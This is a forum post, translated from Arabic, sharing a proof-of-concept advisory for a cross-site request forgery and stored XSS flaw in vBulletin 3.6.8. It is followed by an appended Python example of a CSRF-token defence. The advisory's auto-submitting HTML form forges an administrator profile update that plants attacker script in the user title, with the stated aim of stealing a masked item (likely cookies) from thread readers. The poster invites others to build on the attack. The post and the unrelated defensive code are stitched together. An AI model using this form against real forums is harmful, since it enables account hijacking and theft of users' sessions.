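Peace be upon you, and the mercy and blessings of God Almighty,
How are you, guys of Al-Arrab... well, God willing...
A vulnerability of type XSRF/XSS has been discovered in vBulletin 3.6.8 forums... it was tested on localhost but it could be of use on a remote host as well...
Our dear friend str0ke was contacted, and this is the text of his reply: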
------------------
Nice find man. I currently don't post up xss vulnerabilities though. I
will have a section soon enough and have this posted in it.
Regards,
/str0ke
Napst3r wrote:
> #########################################################################
> vBulletin 3.6.8 XSRF/XSS Vulnerability
> #########################################################################
> --------
> AUTHOR : Napst3r
> Email: xn9@hotmail.fr
> Country: Morocco
> Founded: 5, January 2008
> vBulletin Version: 3.6.8 Patch Level x and possible lower
> Type: XSRF/XSS
> Risk: Medium
> --------
> ##Explanation(english)##
>
> My English is bad, but I try :-) .
> vBulletin 3.6.8 is XSRF vulnerable.
>
> Administrators can use html in their own usertitle.
>
> An attacker can update the profile of an administrator by sending a link
> to a site with a code like this:
>
> <html>
> <head></head>
> <body onLoad=javascript:********.form.submit()>
>
> <form action="link://[click]; method="POST" name="form">
>
> <input type="hidden" name="s" value="">
> <input type="hidden" name="do" value="updateprofile">
> <input type="hidden" name="custom****" value="###########XSS CODE#########"> <!-- Attacker's XSS Code -->
> <input type="hidden" name="month" value="-1">
> <input type="hidden" name="day" value="-1">
> <input type="hidden" name="year" value="">
> <input type="hidden" name="oldbirthday" value="">
> <input type="hidden" name="showbirthday" value="2">
> <input type="hidden" name="homepage" value="">
> <input type="hidden" name="icq" value="">
> <input type="hidden" name="aim" value="">
> <input type="hidden" name="msn" value="">
> <input type="hidden" name="yahoo" value="">
> <input type="hidden" name="skype" value="">
> </form>
> </body>
> </html>
>
> If an attacker sends a link in a pm for example, to the admin with a site
> like the example code, the admin's usertitle is updated and has the code
> of the attacker. The code executes if the admin has a post done in a
> thread etc. An attacker can use this to steal the ****** of all users who
> are reading the thread.
--------
By God, you can develop the idea, guys of Al-Arrab, and that is not hard for you... my level in discovering vulnerabilities is still weak, but God willing things will be better in the coming days
Your brother, Al-Jahed
Salam
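The defensive counterpart to the request described in the advisory, as an added example that is not part of the original post and is not vBulletin's own code: a `do=updateprofile` handler that only accepts a POST carrying a token bound to the logged-in session, plus output encoding of the stored title. The field names `csrf_token` and `user_title`, the session ids and the sample markup are assumptions constructed for the illustration.

```python
import hashlib
import hmac
import html
import secrets

# Per-deployment secret; generated here only so the example is self-contained.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Token tied to one session; the site embeds it as a hidden field
    in the forms it serves itself. A page on another origin cannot read it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_profile_update(session_id: str, form: dict, profiles: dict) -> str:
    """Apply a profile update only when the POST carries this session's token."""
    if form.get("do") != "updateprofile":
        return "ignored"
    expected = issue_csrf_token(session_id).encode()
    supplied = str(form.get("csrf_token", "")).encode()
    # Constant-time comparison; a missing or foreign token fails here,
    # so an auto-submitted cross-site form changes nothing.
    if not hmac.compare_digest(expected, supplied):
        return "rejected"
    # "user_title" is a hypothetical field name standing in for the title field.
    profiles[session_id] = {"user_title": form.get("user_title", "")}
    return "updated"


def render_user_title(profiles: dict, session_id: str) -> str:
    """Treat the stored title as plain text when it is written into a post.
    Assumption: the deployment can give up raw HTML in titles; where it
    cannot, the token check above is the control that matters."""
    title = html.escape(profiles[session_id]["user_title"], quote=True)
    return '<span class="usertitle">' + title + "</span>"


if __name__ == "__main__":
    profiles = {}
    sid = "admin-session-1"  # constructed session id
    # Constructed cross-site POST: right fields, but no token.
    cross_site = {"do": "updateprofile", "s": "", "user_title": "<b>constructed</b>"}
    print(handle_profile_update(sid, cross_site, profiles))   # rejected
    same_site = dict(cross_site, csrf_token=issue_csrf_token(sid))
    print(handle_profile_update(sid, same_site, profiles))    # updated
    print(render_user_title(profiles, sid))
```
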